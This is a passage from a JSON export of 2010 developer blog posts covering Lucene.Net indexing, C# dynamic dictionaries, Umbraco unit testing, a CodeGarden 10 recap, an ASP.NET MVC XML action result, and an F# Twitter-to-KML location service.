I’m indexing). And since I don’t want to be searching this data I’m leaving it unindexed. But so I can easily find this data I’m adding a meta-data property, in the form of the type field. This is something that is just meta data, so I don’t want to display it, but I do need to be able to search on it. That’s why I’m leaving it unstored and analyzed. Lastly I add this to my IndexWriter instance and we’re nearly done.\nNext we need to push in the blogs which we’ve found from here:\nforeach (var item in feed.Items) { doc = new Document(); doc.Add(new Field("title", item.Title.Text, Field.Store.YES, Field.Index.ANALYZED)); doc.Add(new Field("content", StripHtml(item.Summary.Text), Field.Store.NO, Field.Index.ANALYZED)); doc.Add(new Field("categories", string.Join(" ", item.Categories.Select(x => x.Name)), Field.Store.NO, Field.Index.ANALYZED)); doc.Add(new Field("url", item.Links.First().Uri.ToString(), Field.Store.YES, Field.Index.NO)); doc.Add(new Field("type", "BlogPost", Field.Store.NO, Field.Index.ANALYZED)); writer.AddDocument(doc); } Here is pretty much the same as what we had previously, we’re just grabbing some properties and then putting them into the Document which is then written to the index. I’m setting a no-store on the content of the post and it’s categories since these are just things that I’m going to be searching against, but not ever showing it on the UI.\nNow we just do a commit to our index:\nwriter.Commit(); Our blog has been added into our index, woo! Now it’ll be listed below in the data grid:\n##Searching the blogs\nNow that we’ve got some stuff in our index let’s try and get at it. I’ve got another awesome example of UI design for that:\nHere I’ve got a big text box which I can enter a Lucene query using the Lucene Query Parser Syntax so I can just get at the data. Lets say that I want all the posts which had Umbraco in the title:\nOr maybe I’ll get all the ones which contain Umbraco or Lucene.Net:\nAnd here’s the underlying code:\nvar queryParser = new MultiFieldQueryParser(Version.LUCENE_29, new[] { "title", "content", "categories", "type" }, analyzer); var query = new BooleanQuery(); query.Add(queryParser.Parse(this.QueryText.Text), BooleanClause.Occur.MUST); query.Add(queryParser.GetFieldQuery("type", "blogpost"), BooleanClause.Occur.MUST); var results = searcher.Search(query, null, searcher.MaxDoc()); It’s quite simple actually, I’m creating a [MultiFieldQueryParser][11] since the user may be searching across multiple different fields in the index. I’m specifying the fields which I defined earlier then taking the text which the user entered and parsing that into a Query object. I’m also doing a addition of the type field, so the actual query that you’ll end up with actually looks like this:\n+(title:umbraco) +type:blogpost I’m actually wrapping any query the user puts in so that I can postfix the type query but not override anything that they are supplying (ie - any OR conditionals will be cancelled out if the AND for the type is used).\nI’m not supporting paging in the datagrid so I’m just getting back all the results. This is not recommended as it will put a lot more strain on the Lucene index than is really needed. You should only request the number of documents you actually require.\nAnd all that’s left is to hydrate the entities:\nresults.scoreDocs.Select(x => { var doc = searcher.Doc(x.doc); return new { Title = doc.Get("title"), Url = doc.Get("url"), Score = x.score }; }); Then you can push that onto your UI to get the lovely results we saw earlier.\n##Conclusion\nThis is a very quick look at how you can use Lucene.Net to make an application that actually works across multiple data stores. Here I’m using a Lucene index for nothing but searching. I’m pushing data into it but really the end result display is all handled by my other data store, web servers.\nI’ll publish the source code in a little while, along with a downloadable version of this application, but at the moment there’s a few things I need to do, like updating the index as new posts are added and properly binding the data to the UI :P.\nBut hopefully this gives you a view at how you can use Lucene in your own applications.\n", "id": "2010-07-10-building-an-application-with-lucene-net" }, { "title": "Dynamics Library", "url": "https://www.aaron-powell.com/posts/2010-07-05-dynamics-library/", "date": "Mon, 05 Jul 2010 00:00:00 +0000", "tags": [ "dynamic", ".net", "c#" ], "description": "A series of helper methods for working with the DLR in C# 4.0", "content": "When playing with the dynamic keyword and the DLR at CodeGarden 10 I realised that I wanted to do more with it so I started to dig deeper into it. This is where I came up with the idea which I covered in Dynamic Dictionaries with C# 4.0.\nAs some people I’ve talked to since then pointed out what I did was lacking a few things. I told them to be quiet as the blog was only meant to be a quick introduction into the DynamicObject and some of the power which it brings to the table. But really, I was keeping some stuff in reserve, I was working on a more complete API for working with dynamic dictionaries.\n##Introducing AaronPowell.Dynamics\nI decided to put together a set of handy extensions for working with the DLR, a more complete version of the dynamic dictionary which I talked about, and a fluent dynamic XML API.\nI’ve checked the code up on bitbucket so you can grab a copy yourself and get playing with it (or provide me with feedback :P). You can grab it here. And if you want to just get started with the API grab it here.\n##Working with the API\nSo obviously if you’re going to grab a copy you probably want to know what it is. The API contains:\nAaronPowell.Dynamics.Collections.DynamicDictionary AaronPowell.Dynamics.Collections.DynamicKeyValuePair AaronPowell.Dynamics.Xml.XmlNode AaronPowell.Dynamics.Xml.XmlNodeList Additionally each namespace contains extension methods to allow you to convert your static objects into dynamic objects.\n###DynamicDictionary\nThis is what the API is really all about, and it’s using some of the code which I started with in my other article, but I’ve added more to it, like the ability to write to it, and perform standard dictionary operations. I’ve got a series of tests which show what it can do, such as:\n[TestMethod] public void DynamicDictionaryTests_Key_Maps_To_Property() { //Arrange Dictionary<string, string> items = new Dictionary<string, string>(); items.Add("someKey", "someValue"); //Act dynamic d = items.AsDynamic(); //Assert Assert.AreEqual(items["someKey"], d.someKey); } So you can access via a key in the dictionary. Or maybe you want to add new keys:\n[TestMethod] public void DynamicDictionaryTests_New_Key_Added_Via_Property() { //Arrange Dictionary<string, string> items = new Dictionary<string, string>(); //Act dynamic d = items.AsDynamic(); d.hello = "world"; //Assert Assert.AreEqual("world", d.hello); } That’s right, it’s mutable (assuming the source dictionary was mutable, the AsDynamic extension method is on IDictionary<string, TValue> so you can use custom dictionaries).\nAnd DynamicDictionary inherits from IDictionary<string, TValue> so all other standard dictionary object modifiers can be used, it’s an Enumerable object, it’s got count, etc.\n####Performance\nJust a bit of a footnote don’t turn all dictionaries into dynamic ones! Unsurprisingly performance does take a hit when working with the DynamicDictionary object, it’s ~4 times slower than the static one when doing 1 million iterations (you can check out the demo app).\n###Dynamic XML\nThis I can’t actually take credit for, it’s actually modeled off a piece of code by Nikhil Kothari which he wrote for working with RESTful API’s. The problem was that his code doesn’t work with the RTM of C# 4.0, so I’ve made that happen, and I’ve added a few more features, like better handling of children node sets.\nAgain I have a few tests which cover this, and it makes working with XML a much nicer experience, like:\n[TestMethod] public void XmlNodeTests_Attribute_Exposed_As_Member() { //Arrange var xdoc = XDocument.Parse("<node attr='something'></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act //Assert Assert.AreEqual("something", node.attr); } Fluent attribute access, or how about fluent element access?\n[TestMethod] public void XmlNodeTests_Elements_Exposed_As_Members() { //Arrange var xdoc = XDocument.Parse("<node><child>value of child</child></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act //Assert Assert.AreEqual("value of child", node.child); } But I’ve decided to knock it up a notch (BAM!) and added a cooler way to interact with collections. I mean, if you have many children called other, you just want the others right?\n[TestMethod] public void XmlNodeTests_Pluralized_Children_Via_Pluralized_Word() { //Arrange var xdoc = XDocument.Parse("<node><other /><other /><other /></node>"); dynamic node = xdoc.Root.AsDynamic(); //Act var others = node.others; //Assert Assert.IsNotNull(others); Assert.IsInstanceOfType(others, typeof(XmlNodeList)); Assert.AreEqual(3, others.Length); } The pluralization isn’t an exact science (I’ve used the same logic which is used the same logic which is used by SqlMetal) so something like Child doesn’t become Children.\n##Conclusion\nSo that raps it up for the introduction to my new API. It’s just a bit of fun, something to be used carefully (like all of the DLR :P) and hopefully someone finds it a bit of fun.\n", "id": "2010-07-05-dynamics-library" }, { "title": "Documents in Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-07-03-documents-in-lucene-net/", "date": "Sat, 03 Jul 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#" ], "description": "", "content": "As you’re most likely already aware Lucene.Net is a Document Database, which means that it’s essentially a key/ value store, with the crux of the interaction through Documents\n##But what is a Document?\nWhat needs to be understood about the Document concept in Lucene.Net is that is doesn’t have anything to do with a file, it’s not a PDF, a DOCX, or a XLSX. It’s just a key/ value store. As I pointed out in my overview of Lucene.Net this framework is agnostic of anything like that.\nBut unlike other Document Databases, such as RavenDB, Lucene.Net doesn’t allow you to put just an object into itself, you need to do it via a Document. Once a Document is inserted into the Lucene index it is then given a unique identifier (a numerical ID) and the data on the Document is stored.\n##Data on a Document\nWhen pushing the data into a Lucene index it is done via Fields. A Field is a key/ value pair if you want to get a very high view of it, but it’s really a bit more powerful that that. It’s true that it’s primary responsibility is to push data into Lucene with a string key and a string value, and providing information to Lucene about how to store that data in the index.\nWhen you’re adding a Field to Lucene.Net you need to work out which of the available constructors to use, as there are 9 (yes, 9!) different choices. Personally I like this particular constructor:\npublic Field(string name, string value, Store store, Index index) I find that it gives the most flexibility and is the most obvious as to what it’s doing (it’s not the one which we use internal of Examine we actually use a different one as we want to work with TermVectors).\nOn top of the name (key) and value parameters there are also three others, Store, Index and TermVector. Each of these are used to define how the data is handled within the Lucene index.\nAlso, this is where we start getting in to the part of Lucene.Net that I really don’t like, static fields (I miss enums…).\n###Store\nWhen first coming across Lucene the point of Field.Store is a bit confusion, it has two options, YES and NO (ok, it does have a third, COMPRESS, but it’s been deprecated in the Java version of Lucene and replaced by a separate API which is available in Lucene.Net - Lucene.Net.Documents.CompressionTools).\nInitially looking at these two options is confusion, why would you be putting the data Field if you don’t want it stored? Seems a bit strange… But it comes down to what you’re using Lucene.Net for, and having an understanding of that will give you an understanding of what you need to set as your Field.Store value.\nIf you’re using Lucene.Net as a full storage model, a completely replacement of another storage model (such as a relational database) then you want to set it to Store.YES. This tells Lucene to store the value of the field, not just the tokenized version of it.\nIf you are using Lucene.Net as just a search engine, and maintaining the actual data in a separate data store then you can get away with setting Store.NO. This means that when you are ‘hydrating’ your entity from search you’ll be going elsewhere to get the actual data that is required. Essentially doing a two-phase hydration, first finding your entities using Lucene, and then their data from your data store.\n###Index\nThe Index parameter allows you to specify how the data is treated when it’s added to your Lucene index, and this will also effect the searching against it. Also selecting the right Index type will impact on the size of your index.\nThere are 5 types of indexing, let’s start with the basic on, NO. This one is fairly obvious, and it does what you’re expecting. If you set your field with an Index.NO value it’s not going to be accessible via the Lucene searcher. If you’re working directly with the Document object then you can get the data (provided it’s Store.YES :P) it’s accessible via the name of the Field.\nThere other options are about the analysis of the Field data in the index. I’ve looked at Analyzers in the past so hopefully it’s a concept your familiar with. Again, choosing the right option here will impact on the size of the index.\nHere’s a few good rules on whether to use analysis or not with your Field:\nAnalyze if: The value contains multiple keywords The data is to be searched using multiple different ways (such as fuzzy, boosting, etc) The data does not need to be sorted against Don’t analyze if: The value will only be a single word (and not a fuzzy word) The value contains multiple words but requires sorting NORMS/ NO_NORMS really comes down to what you need to do with the value when you’re searching. If you use NO_NORMS then the value isn’t normalized and features such as boost and string-length wont be enabled.\nIn this article I’ve had a look at how the Field.Store and Field.Index can be used to make a simple application using Lucene.Net.\n###TermVector\nI thought I’d cover this even through I tend to let the default (TermVector.NO) get used. TermVector is used to indicate if you want to have metadata about the terms which you’re putting into your index. A term is the value (or values if it’s an analyzed Field).\nThis can be handy if you want to know whether what’s being put into the index contains the same term multiple times, and potentially getting false-positives in your search. It allows you to see how many times a term exists in a Document (TermVector.YES), or you can go one step further and have to stored the position in the Field value which the term appears (TermVector.WITH_POSITIONS) or an offset for where the term appears in the value (TermVector.WITH_OFFSET) and lastly you can go all out with TermVector.WITH_POSITIONS_OFFSETS.\nUse this sparingly, as it can blow out the size of your index if you store everything about everything!\n##Conclusion\nSo to finish off this time we’ve looked at the Document side of a Document Database. Understanding Documents and Fields will allow you to start getting the full power out of the Lucene.Net API.\n", "id": "2010-07-03-documents-in-lucene-net" }, { "title": "Unit Testing with Umbraco", "url": "https://www.aaron-powell.com/posts/2010-06-29-unit-testing-with-umbraco/", "date": "Tue, 29 Jun 2010 00:00:00 +0000", "tags": [ "umbraco", "asp.net", "unit-testing", "webformsmvp" ], "description": "A wrap up from my talk on doing unit tested ASP.NET with Umbraco", "content": "At CodeGarden 10 I did a presentation on Unit Testing with Umbraco which was primarily looking at doing Unit Testing with ASP.NET and then have you can take those principles into doing development with Umbraco.\nUnfortunately the session ran way over time, but we have a good open space the following morning to look deeper into the stuff I didn’t have a chance to cover.\nThe crux of my session was around using ASP.NET WebForms MVP which I’ve doing articles on in the past, including how to do presenters in F# :P.\n##Unit Testing with Umbraco\nWhen doing unit testing with Umbraco there’s a few things you need to take into account:\nReliance on the HttpContext Static methods Because of these things it’s quite hard to stub out a type which is reliant on static methods it’s quite a tricky thing, you really need to use some kind of an isolation framework like Typemock. And if you’re relying on the HttpContext then you need to either spin up Cassini/ IIS, or try and mock it out.\nNodeFactory is a tricky beast, it expects the XML cache, so if you don’t have it where it thinks it should be, then it’s not going to make your life easy.\n###Looking into Snapshot\nIn the past I’ve blogged via my work blog, FarmCode.org, we’re working on a new product called Snapshot which is designed to push out a plain ASP.NET website with no Umbraco reliances at all. During CodeGarden 10 we decided to release part of Snapshot for free, the CMS API, which is designed to abstract away the Umbraco aspect and gives you the ability to do unit testing.\nSnapshot exposes most of what can be done with NodeFactory, Media and umbraco.library, but does so via interfaces. This means that they can be stubbed out and used for testing.\n##Working with ASP.NET WebForms MVP\nSo I wasn’t just using the standard ASP.NET WebForms MVP install, I was also using the Contrib project which I contribute on. I was using this for the Autofac integration, as I wanted to be able to dependency inject more than just the view.\n##Resources from the presentation\nHere’s what you’ll need from my presentation to be able to dig into it yourself:\nSlide Deck Source Code Video Hopefully this gives you a good start for doing unit testing your own Umbraco development.\n", "id": "2010-06-29-unit-testing-with-umbraco" }, { "title": "Dynamic Dictionaries with C# 4.0", "url": "https://www.aaron-powell.com/posts/2010-06-28-dynamic-dictionaries-with-csharp-4/", "date": "Mon, 28 Jun 2010 00:00:00 +0000", "tags": [ "c#", ".net", "dynamic", "umbraco" ], "description": "Using the C# dynamic features to make it easier to work with Dictionary objects", "content": "Have you ever been working with the Dictionary<TKey, TValue> object in .NET and just wanted to find some way in which you can do this:\nvar dictionary = new Dictionary<string, string> { { "hello", "world!" } }; ... var something = dictionary.hello; It’d be sweet, but it’s not possible. The dictionary is just a bucket and there isn’t a way it can know at compile type about the objects which are within it. Damn, so you just have to go via the indexer of the dictionary.\nBut really, using dot-notation could be really cool!\nWell with the .NET 4.0 framework we now have a built in DLR so can we use the dynamic features of the C# 4 to this?\n##Introducing the DynamicObject\nWell the answer is yes, yes you can do this, and it’s really bloody easy, in fact you can do it in about 10 lines of code (if you leave out error checking and don’t count curly braces :P).\nFirst off you need to have a look at the DynamicObject which is in System.Runtime. There’s a lot of different things you can do with the DynamicObject class, and things which you can change. For this we are going to work with TryGetMember, with this we just need to override the base implementation so we can add our own dot-notation handler!\nSo lets start with a class:\nusing System; using System.Collections.Generic; using System.Dynamic; namespace AaronPowell.Dynamics.Collections { public class DynamicDictionary<TValue> : DynamicObject { private IDictionary<string, TValue> dictionary; public DynamicDictionary(IDictionary<string, TValue> dictionary) { this.dictionary = dictionary; } } } Essentially this is just going to be a wrapper for our dynamic implementation of a dictionary. So we’re actually making a class which has a private property which takes a dictionary instance into the constructor.\nNow we’ve got our object we need do some work to get it handle our dot-notation interaction. First we’ll override the base implementation:\npublic override bool TryGetMember(GetMemberBinder binder, out object result) { var key = binder.Name; if (dictionary.ContainsKey(key)) { result = dictionary[key]; return true; } throw new KeyNotFoundException(string.Format("Key \\"{0}\\" was not found in the given dictionary", key)); } And you know what, we’re actually done! Now all you have to do:\nvar dictionary = new Dictionary<string, string> { { "hello", "world!" } }; dynamic dynamicDictionary = new DyanmicDictionary(dictionary); Console.WriteLine(dynamicDictionary.hello); //prints 'world' I’m going to be releasing the source for this shortly (well, an improved version), along with a few other nifty uses for dynamic. So keep watching this space for that ;).\n##Umbraco\nWhile we were working on some sexy features for Umbraco 5 over the CodeGarden 10 retreat we kept saying that we should look at using as many of the cool new .NET framework features which we can possibly get away with. To this extent we kept saying we need to work out how to implement the dynamic keyword in some way.\nWell that’s where the idea for the above code came from, in fact we’ve got a similar piece of code which will be usable within the framework of Umbraco 5 and entity design. But the full info on that will belong to another post ;).\n##Released!\nI’ve rolled the above code (with some improvements mind you) into a new project that I’ve been working on for making working with dynamics in .NET a whole lot easier. You can check out my Dynamics Library and get dynamacising.\n", "id": "2010-06-28-dynamic-dictionaries-with-csharp-4" }, { "title": "CodeGarden 10", "url": "https://www.aaron-powell.com/posts/2010-06-27-codegarden-10/", "date": "Sun, 27 Jun 2010 00:00:00 +0000", "tags": [ "umbraco", "codegarden", "cg10" ], "description": "A look at CG10 and just how awesome it was", "content": "Well CodeGarden, the yearly Umbraco festival, has come and gone for another year and it’s getting bigger and better each year.\nThis was the first time there’s been a three-day event which was CodeGarden, with the first day being an ASP.NET MVC bootcamp day which had Simone Chiaretta, Jon Galloway and Steven Sanderson ran two tracks, one for the beginners of MVC and one for the advanced MVC users. I must admit I missed a fair bit as I was frantically going over my code for the keynote, unit testing talk, linq vs xslt battle and Umbraco v5.\nBut there was some really awesome stuff covered which has given us so really good ideas for v5.\nOne other excitement this year was that day 1 and day 2 were completely recorded and Umbraco HQ will be releasing the videos soon for everyone to enjoy, and this does include the MVC stuff!\nThere was also a Flickr stream set up so you can view the photographic history of the three days!\n##A day of sessions\nThe main day of CodeGarden 10 was opened by Alexander Kjerulf who is the Chief Happiness Officer of Positive Sharing. It was an awesome start to the day and really got the vibe of the rest of the day running. Alex had some great points, about putting the employees happiness first and their happiness will translate into customer happiness just makes sense. I really recommend that you check out the session.\nNext on stage was the man of the hour, Niels Hartvig who had some awesome stats about Umbraco, which is averaging 1000 downloads per day. Wow, really wow… He was then joined by Per who gave a great demo of the released while we watched our.umbraco.org v2. Some of the new features like a new skin (made of sex), better notification and posting solutions (I think I saw some inspirations from stackoverflow there too :P) and the move of the package repo from being an Umbraco HQ managed feature to a community managed feature. Now any package which achieves a vote of 15 or more will be downloadable from within Umbraco itself!\nAfter a round of applause for this years Umbraco MVP’s (well done Dirk, Lee, Warren, Richard and Doug!) it was time for yours-truely to jump on-stage for my first-of-three presentations of the day. I gave a quick run down of how to do LINQ to Umbraco to make a simple photo gallery using CWS.\nOnce I was done it was time for Shannon Deminick to take his turn and show off Examine and then he was awarded the honor of Umbraco Core Member of the Year. Considering all the hard work he’s done (Client Dependency, Examine, the new tree, unit tested data layer, and quite a few more things) it’s completely deserved and I’m sure he’s not going to be bringing that coffee machine to work to share (luckily I don’t drink coffee :P).\nThe keynote was then wrapped up with the announcement that Umbraco 4.1 was not being released, but instead we’ve bumped the version number up to 4.5, which is now available. It’s so damn sweet and you really should check it out. If you’re not using this on every new Umbraco project then I think you’re just mad!\nOnce the Keynote wrapped up Shannon was back on stage to give his Examine talk. On the main stage, to a really large audience he went well, and there was some great feedback at the end of the talk. I may be biased but Examine is a day sexy piece of software.\nAfter lunch it was my turn, I gave my talk on Unit Testing with Umbraco, which was to a standing-room-only crowd! I was psyched at the number of people who turned out for it and to keep with my standard tradition of talks I was epicly over time (I blame the fact that we were running late anyway :P). Because of this we took the discussion into an Open Space for the following day.\nI’ll be posting up the code and a more in-depth look at the topics shortly.\nI was bouncing through the other sessions for that afternoon and frantically preping for the LINQ vs XSLT battle which was during dinner (and also trying to get a sneak peak at what Warren was going to do :P).\nDuring dinner the battle was on, LINQ was showing off intellisense and compile-time validation, while XSLT was showing off quick turn around time of editing and near immediate change results. The first round was taken out narrowly by Warren because it is just quicker to hit and Umbraco UI and edit rather than spin up Visual Studio and Cassini. I took out testing as to get a really rich experience it’s gotta be Visual Studio and well, that’s .NET’s domain ;). The last round was a tie, although I debate the validity of an XSLT interacting with a database :P.\nThe conclusion of the battle was that you really need to find the right tool for the job, parsing XML to do UI is just perfect in XSLT, but for interacting with an external system .NET really can’t be beat.\n##The day of community events\nThe final day of CodeGarden 10 was the traditional day of open space sessions. And again I was spending the day with my speakers hat on!\nFirst up I was doing a Q & A from my Unit Testing with Umbraco talk, looking at how to use WebForms MVP, debating MVC vs MVP (which I think is a mute point) and avoiding questions about Umbraaco v5.\nThis was followed up by the session on Why You Shouldn’t Use Umbraco. It was a great topic and at lot of good discussion of why Umbraco isn’t the always the right tool.\nThen Alex Norcliffe and I (well, mostly Alex :P) frantically worked to get the Umbraco v5 talk ready and he just fell short of getting a good code demo working (he did later that day :P). And yet again to packed out room we talked Umbraco v5. We looked at the architecture which we’re going with and then doing a long Q & A session to get community feedback on what people want to get from v5. We were really excited with the feedback and we’re working really hard to get more stuff sorted for it.\nLastly we finished off the day with the traditional Umbraco package competition and (new this year) the Umbraco skin competition.\nSebastiaan Janssen took out third place with his Image Meta Data package (great for photographers), I took out 2nd place with a package I created for TheFARM, TheFARM Media Link Checker, and Shannon took it out with a multi-tree picker which he wrote that morning for an open-space session, no wonder he’s core developer of the year! Big thanks to all who clapped loudly and Microsoft for the XBox 360 prize!\nFor the skin contest the UI master Warren Buckley took it out with his awesome retro theme of skinning Umbraco to look like a 1990’s GeoCities website built by some 12 year old kid. Let’s hope he releases it to download :P!\n##Wrapping up\nCodeGarden 10 is by far the most fun festival I’ve been to recently. Notice how I keep referring to it as as a festival not a conference. This is because it is more about celebrating Umbraco, celebrating the evangelists, celebrating the MVP’s and celebrating the community.\nWell done to Umbraco HQ for getting it organised and well done to everyone who presented. It sucks that we’ve got to wait 12 months before we get to do it all again!\n", "id": "2010-06-27-codegarden-10" }, { "title": "ASP.NET MVC XML Action Result", "url": "https://www.aaron-powell.com/posts/2010-06-16-aspnet-mvc-xml-action-result/", "date": "Wed, 16 Jun 2010 00:00:00 +0000", "tags": [ "asp.net", "asp.net-mvc", "c#", "xml" ], "description": "An easy way to return XML from ASP.NET MVC", "content": "For my Location Service in F# I needed a way to be able to return XML from MVC (which powers my site), but I couldn’t find a way to do this out of the box with XML.\nLuckily creating your very own ActionResult is really quite easy in MVC.\nFirst you need to implement the ActionResult class:\npublic class XmlActionResult : ActionResult { public override void ExecuteResult(ControllerContext context) { } } I’m going to add a couple of public properties:\npublic XDocument Xml { get; private set; } public string ContentType { get; set; } public Encoding Encoding { get; set; } I’ve put the ContentType publicly settable so you can customize the content type which will be set on the response. And I’ll have a constructor which takes the XDocument:\npublic XmlActionResult(XDocument xml) { this.Xml = xml; this.ContentType = "text/xml"; this.Encoding = Encoding.UTF8; } Here I’ve set the default ContentType as text/xml so that’s what’ll generally be returned from the ActionResult.\nAnd implementing ExecuteResult is really quite simple:\npublic override void ExecuteResult(ControllerContext context) { context.HttpContext.Response.ContentType = this.ContentType; context.HttpContext.Response.HeaderEncoding = this.Encoding; XmlTextWriter writer = new XmlTextWriter(context.HttpContext.Response.OutputStream, Encoding.UTF8); Xml.WriteTo(writer); writer.Close(); } All you have to do is to write the XML into the Response stream (you can’t just return the XML, if you do you’ll strip out the XML declaration).\nTo then use it in your View it’s just like this:\nvar kml = AaronPowell.FindMe.KmlGenerator.TwitterToKml("@" + twitterUser + " tracking", statuses); return new XmlActionResult(kml) { ContentType = "application/vnd.google-earth.kml+xml" }; And that’s why I left the ContentType as modifiable, it means I can say that I’m sending out KML instead of standard XML. You can easily use this for RSS, Atom, etc. In fact I should probably port the RSS feed within this site :P.\n", "id": "2010-06-16-aspnet-mvc-xml-action-result" }, { "title": "Creating a location service with F# and Twitter", "url": "https://www.aaron-powell.com/posts/2010-06-16-location-service-with-fsharp-and-twitter/", "date": "Wed, 16 Jun 2010 00:00:00 +0000", "tags": [ "f#", "twitter", "geo-location" ], "description": "Using Twitter to stalk someone has never been so easy!", "content": "A while ago Tatham Oddie sent me a small app he’d built which allowed you to find recent locations which he had been at, data which is scraped via twitter (you can see it here). It’s rather a nifty little thing and it’s done with approximately 50 lines of ruby (although I must point out that he is using some external libraries which do mean that he’s got a lot more code, just not all his :P).\nI’d always contemplated having a crack at doing something like this as it’s a good way to investigate some functional programming.\nWell while sitting in the Qantas club lounge waiting for my flight back from Remix earlier this month I decided to write it, using F#. Hey, why the hell not!\nGetting started So today I finally got around to finishing the code and deploying it onto my website, in fact you can see it in action via https://www.aaron-powell.com/findme. I’ve also made this in a way which you can test with any username, say, Tatham’s - https://www.aaron-powell.com/findme/tathamoddie.\nI also added support for Twitter lists, so say, readify - https://www.aaron-powell.com/findme/digory/readify.\nWhat you’ll see is that this is actually just a redirect to Google Maps, passing in a URL like https://www.aaron-powell.com/findme/kml/slace. If you hit this URL you’ll get back an XML file, well actually you’ll get back a KML file, which stands for Keyhole Markup Language.\nKML KML is the markup language for geo-location which Google is backing (in fact Keyhole is the original name of the company which Google Earth came from), and all it does is defines a series of points and a series of styles.\nThis is what a basic KML file looks like:\n<?xml version="1.0" encoding="utf-8" standalone="yes"?> <kml> <Document> <name>@slace tracking</name> <Style id="icon-000"> <IconStyle> <color>ffffffff</color> <colorMode>normal</colorMode> <Icon> <href>http://aaron-powell.com/get/map-pins/0010.png</href> </Icon> </IconStyle> </Style> <Placemark> <name>001. Wed 16 Jun 09:42:11 2010</name> <styleUrl>#icon-000</styleUrl> <Point> <coordinates>151.25144901, -33.91480491</coordinates> </Point> </Placemark> </Document> </kml> As you can see I define a style element (which has an image) and a point (which has the longitude and latitude).\nIf you want to learn more about KML I suggest you look here.\nGetting our data As I mentioned this app is scrapping via twitter, and if you’re using twitter you’re probably aware that you can choose to geotag your tweets, most twitter clients support this.\nAll I’m doing is using some of the public REST API’s which twitter has to pull down the data I require, and then filtering it for what I want.\nLooking at some code So we need to scrape some data from twitter. To do this you can use an existing .NET API such as TweetSharp, but at the moment I’ve rolled my own very basic twitter API in F# (also, as part of my learning experience).\nDisclaimer - I don’t suggest writing a full API in F#, it’s definitely not the best language for class libraries :P\nI’ve made a simple little method which you can invoke from my API which takes a URL and gives you back the various statuses:\nlet TwitterStatusGet (url:string) = let webRequest = HttpWebRequest.Create url // set the method to GET webRequest.Method <- "GET" // set up the stream let reqStream = webRequest.GetResponse() reqStream.Headers.Add(HttpResponseHeader.CacheControl, "public, max-age=300") let streamReader = new StreamReader(reqStream.GetResponseStream()) let response = streamReader.ReadToEnd() // close the stream reqStream.Close() streamReader.Close() let xml = XDocument.Parse(response) xml.Descendants(!!"status") |> Seq.map(fun e -> new Status(e)) So this is defining a method named TwitterStatusGet which has a String input value. This is passed to the HttpWebRequest.Create method, and then we invoke the request and turn the response into XML. We then take the tranformed XML, find all the descendants with the name status and then turn them into a .NET type which I’ve created (the internals of it are irrelevant here), and then returns them.\nThe method Seq.map is essentially an F# version of the IEnumerable.Select.\nThen we need to filter them for ones which haven’t been geotagged:\nlet statuses = TwitterStatusGet ("http://api.twitter.com/1/statuses/user_timeline.xml?screen_name=" + username + "&count=" + count.ToString()) let taggedStatuses = statuses |> Seq.filter(fun e -> e.Geo.Lat <> 0.0) Then I just add a bit of code to get rid of statuses which are next to each other (saying to had several tweets from the same place isn’t very interesting):\nlet points = new List<Status>() for i in 0 .. taggedStatuses.Count()-1 do let curr = taggedStatuses.ElementAt(i); if points.Count > 0 then let prev = points.ElementAt(points.Count-1) if calculate_displacement prev.Geo curr.Geo > 0.5 then points.Add(curr) else points.Add(curr) To do this I’ve got a funky little method for calculating the distance between two points:\nlet rad deg = deg*(Math.PI/180.0) let calculate_displacement (point1: LatLon) (point2: LatLon) : float = let radius = 6371.0 let dLat = rad(point2.Lat-point1.Lat) let dLon = rad(point2.Lon-point1.Lon) let a = Math.Sin(dLat/2.0) * Math.Sin(dLat/2.0) + Math.Cos(rad(point1.Lat)) * Math.Cos(rad(point2.Lat)) * Math.Sin(dLon/2.0) * Math.Sin(dLon/2.0) radius * (2.0 * Math.Atan2(Math.Sqrt(a), Math.Sqrt(1.0-a))) I’m sure I could write this is a much F#-y way, and if someone wants to do that please show me how, but we’re just doing some simple calculations based on the points and then returning the distance between them.\nThe last piece of the puzzle is tranforming the unique points which we now have into KML. I’m going to spare that bit of code for the moment, I’m using LINQ to XML to do this, and working with LINQ to XML in F# requires a whole blog post of its own.\nPutting it all together So now that I’ve got all this data I can now just add a reference into my blog project which then return the data. I’ve noticed that Google Maps has a very quick timeout which means that sometimes you’ll get an error for your requests, but hit it again after a minute or two and it generally comes back. Also, I’ve added a 1 hour output cache on each request so if you do new tweets they wont appear immediately.\nI just set up a few simple routes which support both username and list name passing.\nAnd there you go, that’s how you can use twitter to scrape the data about where someone has been tweeting from. Feel free to use my service, I’m thinking of setting up a CG10 list which you can then track people who are coming to CodeGarden this year ;).\n", "id": "2010-06-16-location-service-with-fsharp-and-twitter" }, { "title": "ASP.NET MVC Model binding with implicit operators", "url": "https://www.aaron-powell.com/posts/2010-06-14-aspnet-mvc-model-binding-with-implicit-operators/", "date": "Mon, 14 Jun 2010 00:00:00 +0000", "tags": [ "asp.net", "asp.net-mvc", "c#", "model-binding" ], "description": "Using implicit operators in model binding with ASP.NET MVC", "content": "In the past I’ve had a bit of a play around with operators, I looked at explicit and implicit operators and it’s really quite powerful.\nWhen I upgraded my website to be powered by PaulPad, and upgraded PaulPad to ASP.NET MVC2 I ran into a problem, Paul uses implicit model binding to handle the URLs. The problem was that the ModelBindingContext changed between MVC1 and MVC2, resulting in the implicit operator binding implementation failing to compile!\nA quick look at Model Binding Without going too in-depth into what Model Binding is all about, essentially it’s how to map the posted data from a form to a .NET object. It’s great if you want to handle custom objects from UI to back-end. It’s not as required in MVC2 as it was in MVC1, but if you want to do something like implicit operators, well that’s where we’re going to need it.\nIf you want to learn more on Model Binding you can just Google it with Bing.\nImplementing implicit Model Binding To get started we need to make a class that inherits from IModelBinder:\npublic class ImplicitAssignmentBinder : IModelBinder { public object BindModel(ControllerContext controllerContext, ModelBindingContext bindingContext) { throw new NotImplementedException(); } } So now that we’ve got our stub type we need to start implementing it. The first thing we need to do is see if we’ve got an implicit operator between our CLR types. We can do this with a few simple LINQ statements:\nvar implicitAssignment = bindingContext.ModelType.GetMethods(BindingFlags.Public | BindingFlags.DeclaredOnly | BindingFlags.Static) .Where(x => x.Name == "op_Implicit") .Where(x => bindingContext.ModelType.IsAssignableFrom(x.ReturnType)) .FirstOrDefault(); Here we’re using reflection to look for an implicit operator. If you’re using reflection to locate an operator they are always prefixed with op_, and if you’re looking for an implicit operator, then it’s named Implicit (explicit operators are op_Explicit).\nNext we need to find one which is an 